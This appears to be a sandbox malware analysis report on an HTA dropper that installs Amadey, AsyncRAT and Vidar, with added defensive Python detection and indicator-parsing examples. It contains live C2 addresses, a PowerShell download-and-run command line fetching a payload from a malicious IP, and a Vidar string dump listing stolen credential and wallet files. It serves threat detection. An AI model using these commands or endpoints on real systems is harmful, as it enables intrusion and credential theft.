Windows Analysis Report
SeP4o9Jp8A.hta

Overview

General Information

Sample name: SeP4o9Jp8A.hta
renamed because original name is a hash value
Original sample name: 0fbeda64692d967eee2451cedcec0989f226ffceba72d6ccefa61befa14ac70f.hta
Analysis ID: 1599702
MD5: 7c149412d115b6a1f3fd7ce75012589b
SHA1: d82b268dcfefbb6370714f2cbfadb510c5e3480e
SHA256: 0fbeda64692d967eee2451cedcec0989f226ffceba72d6ccefa61befa14ac70f
Tags: hta, user-JAMESWT_MHT

Detection

Amadey, AsyncRAT, PureLog Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Yara detected Amadey
Yara detected Amadey's stealer DLL
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Hides threads from debuggers
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
PE file contains section with special chars
Potentially malicious time measurement code found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (suppress errors)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
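
The Sigma titles in the list above name process-creation and registry patterns but not the conditions behind them. The following added example (written for this page; it is neither SigmaHQ rule logic nor Joe Sandbox code) implements simplified versions of six of those detections and runs them over constructed Sysmon-style events modelled on this chain: mshta.exe spawning a PowerShell download cradle, a script host run from %LOCALAPPDATA%\Temp, schtasks.exe pointing into a user-writable folder, Chrome started with --remote-debugging-port (the pattern behind the "Attempt to bypass Chrome Application-Bound Encryption" and "Browser Started with Remote Debugging" signatures, matching the ws://localhost:9223 and Storage.getCookies strings in the Vidar binary further down), and a Run value pointing at the Amadey install folder. The event contents, task parameters and script file name are assumptions, not sandbox output.

```python
"""Simplified process-creation / registry detections modelled on the Sigma rule
titles in this report. Illustrative logic only, not the SigmaHQ rules.
Events are constructed to resemble Sysmon Event ID 1 (process create) and
Event ID 13 (registry value set); they are not taken from the sandbox run."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int               # 1 = process create, 13 = registry value set
    image: str = ""             # created process (EID 1) or writing process (EID 13)
    parent_image: str = ""
    command_line: str = ""
    target_object: str = ""     # registry value path (EID 13 only)
    details: str = ""           # registry value data (EID 13 only)


SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\wscript.exe", "\\cscript.exe")
BROWSERS = ("\\chrome.exe", "\\msedge.exe", "\\brave.exe", "\\opera.exe")
# user-writable locations that legitimate autostarts and scheduled tasks rarely point to
USER_WRITABLE = re.compile(
    r"%(appdata|localappdata|temp|tmp|public|programdata)%"
    r"|\\appdata\\(local|roaming)\\|\\users\\public\\|\\programdata\\", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod"
    r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
RUN_KEYS = re.compile(r"\\currentversion\\run(once)?\\", re.I)


def _img(e, suffixes):
    return e.image.lower().endswith(suffixes)


def suspicious_mshta_child(e):
    return e.event_id == 1 and e.parent_image.lower().endswith("\\mshta.exe") and _img(e, SCRIPT_HOSTS)


def powershell_web_download(e):
    return e.event_id == 1 and _img(e, ("\\powershell.exe", "\\pwsh.exe")) \
        and bool(DOWNLOAD_CRADLE.search(e.command_line))


def schtasks_from_user_writable(e):
    cl = e.command_line
    return e.event_id == 1 and _img(e, ("\\schtasks.exe",)) \
        and re.search(r"/create\b", cl, re.I) is not None and bool(USER_WRITABLE.search(cl))


def script_host_from_user_writable(e):
    cl = e.command_line
    return e.event_id == 1 and _img(e, ("\\wscript.exe", "\\cscript.exe")) \
        and re.search(r"\.(js|jse|vbs|vbe|wsf)\b", cl, re.I) is not None and bool(USER_WRITABLE.search(cl))


def browser_remote_debugging(e):
    # DevTools over localhost lets a stealer read cookies already decrypted by the browser
    return e.event_id == 1 and _img(e, BROWSERS) and "--remote-debugging-port" in e.command_line.lower()


def run_key_to_user_writable(e):
    return e.event_id == 13 and bool(RUN_KEYS.search(e.target_object)) and bool(USER_WRITABLE.search(e.details))


RULES = {
    "Suspicious MSHTA Child Process": suspicious_mshta_child,
    "PowerShell Web Download": powershell_web_download,
    "Suspicious Schtasks From Env Var Folder": schtasks_from_user_writable,
    "WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript": script_host_from_user_writable,
    "Browser Started with Remote Debugging": browser_remote_debugging,
    "New RUN Key Pointing to Suspicious Folder": run_key_to_user_writable,
}


def evaluate(events):
    """Return (event index, rule title) for every rule that fires on every event."""
    return [(i, title) for i, e in enumerate(events) for title, rule in RULES.items() if rule(e)]


# Constructed events modelled on the chain in this report (paths from the report, details assumed).
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\SysWOW64\mshta.exe",
          "powershell -w hidden (New-Object Net.WebClient).DownloadFile('https://176.113.115.163/thebig/stail.exe', $env:TEMP + '\\stail.exe')"),
    Event(1, r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\cmd.exe",
          r'wscript //B "C:\Users\user\AppData\Local\Temp\764661\stage2.js"'),          # script name assumed
    Event(1, r"C:\Windows\SysWOW64\schtasks.exe", r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe",
          r'schtasks /create /f /sc minute /mo 1 /tn "skotes" /tr "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"'),  # task parameters assumed
    Event(1, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe",
          r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9223 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data"'),
    Event(13, r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe",
          target_object=r"HKU\<user SID>\Software\Microsoft\Windows\CurrentVersion\Run\skotes.exe",
          details=r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"),
    # benign control: the user launching Chrome from Explorer must not fire anything
    Event(1, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
          r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'),
]

if __name__ == "__main__":
    for idx, title in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {title}")
```

The user-writable-folder test is what separates these from everyday administration: schtasks.exe, Run values and script hosts are common, but their targets normally live under Program Files or System32, whereas every artifact in this report sits under AppData\Local\Temp or ProgramData.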

Classification

Amadey
Description: Amadey is a botnet that appeared around October 2018 and is sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and the installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool, but it is also used maliciously because it provides functionality such as a keylogger, remote desktop control and many other functions that can harm the victim's computer. AsyncRAT can be delivered via spear-phishing, malvertising, exploit kits and other techniques.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Vidar
Description: Vidar is a forked malware based on Arkei. It seems to be one of the first stealers that grabs information on 2FA software and the Tor Browser.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: https://176.113.115.163/thebig/stail.exe Avira URL Cloud: Label: malware
Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stail[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tYrnx75[1].exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1053671001\0269e2f5f3.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 63%
Source: SeP4o9Jp8A.hta Virustotal: Detection: 23%
Source: SeP4o9Jp8A.hta ReversingLabs: Detection: 18%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.8% probability
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Joe Sandbox ML: detected
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: 185.215.113.43
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: S-%lu-
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: abc3bc1985
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: skotes.exe
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Startup
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Programs
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: %USERPROFILE%
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: clip.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: http://
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: https://
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: /quiet
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Plugins/
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: &unit=
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: shell32.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: kernel32.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: GetNativeSystemInfo
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProgramData\
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: AVAST Software
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Kaspersky Lab
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Panda Security
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Doctor Web
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: 360TotalSecurity
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Bitdefender
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Norton
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Sophos
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Comodo
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: WinDefender
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: 0123456789
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ------
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ?scr=1
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ComputerName
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: -unicode-
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: VideoID
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProductName
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: CurrentBuild
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32.exe
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: "taskkill /f /im "
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && timeout 1 && del
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: && Exit"
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && ren
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Powershell.exe
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: shutdown -s -t 0
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: random
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: 7707
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: 159.100.19.137
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: 0.5.8
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: false
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: yBu0GW2G5zAc
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: false
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: null
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: false
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: Default
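
The three "Malware Configuration Extractor" lines above use different keys per family (Vidar and Amadey give a "C2 url", AsyncRAT gives "Server" and "Ports"), and one of them is not a C2 at all but a profile page on steamcommunity.com that Vidar reads to find its real C2. The following added example (this page's own code, not Joe Sandbox's) parses those lines into normalised indicators and flags the dead-drop case so the legitimate domain is not put on a blocklist. The report lines are embedded as input; the regex, the dead-drop host list and the output tuple layout are this example's assumptions.

```python
"""Added example: turn the 'Malware Configuration Extractor' lines of this report
into normalised network and host indicators. The input is copied from the AV
Detection section; parsing and the dead-drop list are this example's assumptions,
not Joe Sandbox output."""
import json
import re
from urllib.parse import urlsplit

# Joe Sandbox prints: "Source: <dump> Malware Configuration Extractor: <Family> {json}"
EXTRACTOR_LINE = re.compile(
    r"Malware Configuration Extractor:\s*(?P<family>\w+)\s*(?P<cfg>\{.*\})\s*$")

# Legitimate services abused as dead-drop resolvers (assumed list): the real C2 is read
# from a profile or channel page, so the actionable indicator is the URL, not the domain.
DEAD_DROP_HOSTS = {"steamcommunity.com", "t.me"}


def _is_ip(host):
    return re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host or "") is not None


def parse_extractor_line(line):
    """Return (family, config dict) or None if the line is not an extractor result."""
    m = EXTRACTOR_LINE.search(line)
    if not m:
        return None
    return m.group("family"), json.loads(m.group("cfg"))


def iocs_from_config(family, cfg):
    """Normalise family-specific keys into (type, value, note) tuples."""
    out = []
    if "C2 url" in cfg:                                    # Vidar and Amadey extractors
        url = cfg["C2 url"]
        if "://" not in url:
            url = "http://" + url                          # Amadey config omits the scheme
        host = urlsplit(url).hostname
        if host in DEAD_DROP_HOSTS:
            out.append(("url", url, f"{family} dead-drop resolver; do not block {host}"))
        else:
            out.append(("url", url, f"{family} C2"))
            out.append(("ip" if _is_ip(host) else "domain", host, f"{family} C2 host"))
    if "Server" in cfg:                                    # AsyncRAT extractor
        for host in str(cfg["Server"]).split(","):
            for port in str(cfg.get("Ports", "")).split(","):
                out.append(("socket", f"{host.strip()}:{port.strip()}", f"{family} C2"))
    if "Install Folder" in cfg and "Install File" in cfg:  # Amadey persistence path
        out.append(("file", f"{cfg['Install Folder']}\\{cfg['Install File']}",
                    f"{family} install path (under %LOCALAPPDATA%\\Temp in this run)"))
    return out


def extract(lines):
    iocs = []
    for line in lines:
        parsed = parse_extractor_line(line)
        if parsed:
            iocs.extend(iocs_from_config(*parsed))
    return iocs


# Input copied from the AV Detection section of this report; the last line is a
# non-extractor line included to show it is ignored.
REPORT_LINES = [
    'Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}',
    'Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}',
    'Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}',
    "Source: https://176.113.115.163/thebig/stail.exe Avira URL Cloud: Label: malware",
]

if __name__ == "__main__":
    for kind, value, note in extract(REPORT_LINES):
        print(f"{kind:7} {value:55} {note}")
```

The Amadey and AsyncRAT endpoints (185.215.113.43 and 159.100.19.137:7707) are safe to block outright; the Steam profile URL should be watched for retrieval by non-browser processes rather than blocked by domain, since blocking steamcommunity.com breaks legitimate traffic and the operator can move the profile at will.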

Phishing

Source: Yara match File source: SeP4o9Jp8A.hta, type: SAMPLE

Compliance

Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 54.2.crossplatformplayer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1
Source: Binary string: vdr1.pdb source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram 
